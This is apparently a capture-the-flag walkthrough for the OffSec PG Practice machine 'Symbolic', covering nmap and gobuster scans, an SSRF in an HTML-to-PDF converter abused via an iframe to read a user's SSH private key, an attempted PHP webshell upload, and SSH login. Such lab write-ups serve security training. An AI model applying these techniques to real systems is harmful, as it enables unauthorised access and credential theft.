Symbolic Walkthrough
Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)
1. Scanning
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 125 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:40:e2:ef:21:ea:c1:77:b6:14:a3:f7:04:59:45:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcjA6Du6Xclk6bj2jRxFnRpmqAaGYZBeR4bZ+ZlpEc3HQxgUVtevQcEwV/GkD1uHnkavTJLsV8xf0SxHOxvjlCTHVxCApToP7QQkXH+wNw9kMz8xhzI0fVxvTTWGcOskfxgTfw7AcvYsXmKbJnUwZRaNdr5GtdJqO9jW1WprImYTY7ZSxzfxomZiQj87g21nbY/QSPfeJXbmacl9U52B9KB6StxVCGrS0hL3PIfDbQvGYiDqfH1/0UrE8NsdC3cmf2yMHwrpUXiHv6aMwpOP4WHhsBZgqotqaj5clEq051IylC5RcRGVmPqG5m7Sb1F91L43RLVfp5gSDX/K097bOL
| 256 f8:fb:e3:c6:16:3a:e2:62:d0:e2:ae:d4:f2:9e:6f:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEsNFRln5wL+8mm70Jhj1dYrLiOfcB1bg1sJRbZu84TZhAuaZuab6L3L77D1Iz/o2guD9TyvRvcU3nRIxdvIUxw=
| 256 94:5e:97:ad:f9:0f:81:b6:6b:3b:bd:98:43:c0:0d:6a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPGpJEAiGfo+odXRYF/qTK3JeKYerp7y7Qn6wVd4pByr
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: WebPage to PDF
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
Enumeration
So we only have 2 port open and primary concern is always HTTP for me.
Enumearting port 80 HTTP
Quickly going to the browser.
So we have a website that can convert URL into pdf .. Let's start enumearting the website
└─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,aspx,html,pdf,conf,lua
Found some intersting URI.
Going manually on the found links I see there there are pdfs saved there, Probably it is saving the PDFs that it is generating.
And one of the PDFs contain private key. since we have no idea about the user we'll save it and enumerate further.
Exploitation
SSRF
Used webshell.php file but website failed to render it, So it also states HTML2PDF I changed the extension and uploaded it and it rendered the php code.
But we cannot execute any commands on the webshell .
I tried a lot of things I tried php functions such as include , readfile etc. but failed after many tries I used iframe src and it worked for me.
Now we can continue our enumeration this way but getting an interactive shell is idea.
so for this we will fetch ssh keys of the user p4yl0ad assuming the user from the webpage .
I was able to fetch the ssh key, and looks like it is same as the one found in the beggning of the enumeartion, I could have used it but its ok , now well use this key.
Initial Access.
Using the key we got the access to the machine.
ssh -i id_rsa p4yl0ad@192.168.121.177
